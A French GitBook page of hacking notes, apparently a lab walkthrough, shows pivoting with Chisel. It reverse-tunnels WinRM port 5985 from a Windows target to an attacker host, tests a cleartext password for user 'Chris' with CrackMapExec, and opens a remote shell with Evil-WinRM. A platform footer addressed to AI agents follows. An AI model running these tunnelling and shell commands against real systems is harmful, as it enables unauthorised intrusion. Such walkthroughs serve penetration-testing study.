> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/post-exploitation/pivoting-port-forwarding-5985-winrm.md).

# Pivot par redirection de port (5985 WinRM)

## Chisel

{% embed url="<https://github.com/jpillora/chisel/releases>" %}

**Téléchargement et préparation des fichiers :**/ Nous avons téléchargé les fichiers compressés **Chisel** fichiers, à savoir :

* `chisel-linux`
* `chisel-windows.exe`

{% embed url="<https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz>" %}

{% embed url="<https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gz>" %}

Après avoir extrait les fichiers, transférez le **Chisel** binaire vers la cible Windows :

```bash
copy //10.10.14.3/smb/chisel-windows.exe chisel-windows.exe
```

<figure><img src="/files/5e0ce60a3d2445eb7230d2a76770769ff73c9e69" alt=""><figcaption></figcaption></figure>

**Écoute sur la machine attaquante avec Chisel :**/ Lancer **Chisel** en mode serveur sur la machine attaquante sur le port 8888 :

```bash
./chisel-linux server -p 8888 -reverse
```

Puis, sur la machine Windows, exécutez **Chisel** en mode client et redirigez le port 5985 vers la machine attaquante :

```bash
chisel-windows.exe client 10.10.14.3:8888 R:5985:127.0.0.1:5985
```

<figure><img src="/files/558af1b40a3b170a65e606e46da8901d7abba2b5" alt=""><figcaption></figcaption></figure>

**Vérification du port redirigé avec `lsof`:**/ Nous avons déjà vérifié que le port 5985 est bien affiché après la redirection avec la commande :

<figure><img src="/files/596f1b80acbf6e48b0794dffd50591ad3628e9e7" alt=""><figcaption></figcaption></figure>

**Connexion avec WinRM :**/ Nous avons maintenant utilisé **CrackMapExec** pour tester la connexion via **WinRM** sur le port 5985 redirigé :

```bash
crackmapexec winrm 10.10.14.3 -u 'Chris' -p '36mEAhz/B8xQ~2VM'
```

* Le **compromis** le marqueur confirme que les identifiants peuvent accéder à la machine via WinRM.

<figure><img src="/files/ee088da6851fdeb39cd4a07e655058bc3ee9329c" alt=""><figcaption></figcaption></figure>

**Connexion finale avec Evil-WinRM :**/ Enfin, nous avons utilisé **Evil-WinRM** pour obtenir un shell distant en tant que **Chris**:

```bash
evil-winrm -i 10.10.14.3 -u 'Chris' -p '36mEAhz/B8xQ~2VM'
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/post-exploitation/pivoting-port-forwarding-5985-winrm.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
